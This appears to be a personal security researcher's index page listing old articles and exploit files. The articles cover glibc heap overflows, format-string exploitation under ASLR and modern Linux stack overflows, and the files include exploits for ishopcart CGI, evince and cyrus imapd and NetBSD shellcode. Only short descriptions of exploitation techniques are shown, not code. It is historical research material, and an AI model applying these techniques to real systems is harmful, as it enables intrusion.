tptp.cc security.html


Here I place code i've written in the security field and articles i've written in the security field over the years. I've had to do this page over many times, and find articles and code again on the internet, reason being i'm always loosing code.. articles.. entire operating systems.. and minds.. residents.. etc :). One exploit that is not here is my exim i wrote in perl. I note that one because it -- like these -- was very universal for a memory exploit and was very stable from unix to unix and architecture microprocessor to the next. I lost it. I will eventually write it again in c and final up this little area of history.

house_of_mind.txt 01/01/2007 - The House of Mind - This article explains and demonstrates how to exploit heap overflows through heap structure in the latest linux glibc implementation, once again proving it's possible after the old, easy, unlink() method was patched in 2004 and no longer worked. The article by "blackngel" in the latest PHRACK (66 as of may 13, 2010) furthers this article by demonstrating the other methods suggested in the "Malloc Maleficarum" and providing other newly discovered (and public) methodologies on exploiting glibc heap overflows in a definite and static fashion. He also makes some minor modifications to my POC.
fmat.txt 10/10/2006 - An Alternative Method in Format String Exploitation - This article describes how to make format strings static and practical again on systems with ASLR (or "random VA") (such as the latest linux). It describes how one could write the entire *SHELLCODE* to a deffinite offset using the format string, so that the address is known. After which the exploiter would somehow get that address executed in a fashion that was static, such as placing in in the .dtors
bofoml.txt 05/31/2010 - Buffer Overflows on Modern Linux - This article describes how the standard method for returning from a stack frame is no longer used in linux, and explains and demonstrates how a generic buffer overflow would be exploited on modern linux.
ishopcart-cgi-bof.c
ishopcart-cgi-bof.c.txt
An exploit I wrote for a buffer overflow I found in a cgi shopping cart system written in c, called ishopcart. It had rather great execution success in that the cgi could be requested as many times as pleased, a simple shell wrapper around the exploit could be used to find the perfect offset.
evince-ps-field-bof.c
evince-ps-field-bof.c.txt
This is an exploit i wrote for the evince document viewer after a vulnerability was discovered in 'gv'. This had rather great execution success because it used a "jmp *esp" as it's offset that at the time, was found to be static to all userland applications in the 2.6 linux kernel (via a linux "DSO") It also bypassed ASLR. Just clicking a .pdf in your browser could potentially start evince, and since it used the "jmp *esp" that was at the time static on all 2.6 kernel userland applications, it was almost guarenteed to execute on any current vanilla linux installation.
bid-18056.pl
bid-18056.txt
This exploit was for the cyrus imapd. It had rather great execution success in that it overwrote stack space that variable *user and *userbuf pointed to with the shellcode. Then, overwrote EIP and *out with an address, the data at *user/*userbuff was written to the address that *out contained. So in other words, place any address that is writeable and executable (and that is not going to be used by shellcode ops) into EIP/*out and the shellcode at *user/*userbuff will get written to *out which is the same address in EIP. Great :)
create_conns.c
create_conns.c.txt
some code i wrote on 10/04/2009 for no real current purpose just wanted to code some code i was going to feel good coding :). It creates connections to a server with more options than just that.. including children processes, nanosecond sleep in between each socket, seconds sleep in between a set number of created sockets, a text string to send once connected, etc.
netbsd_5_0_x64_execve_bin_sh.c
netbsd_5_0_x64_execve_bin_sh.c.txt
this is an execve of /bin/sh x86_64 shellcode for netbsd. milw0rm didn't have any netbsd x86_64 code yet so here it is. my next project is to create a callback shell for netbsd x86_64 but that's some work and i'm still a n00p :).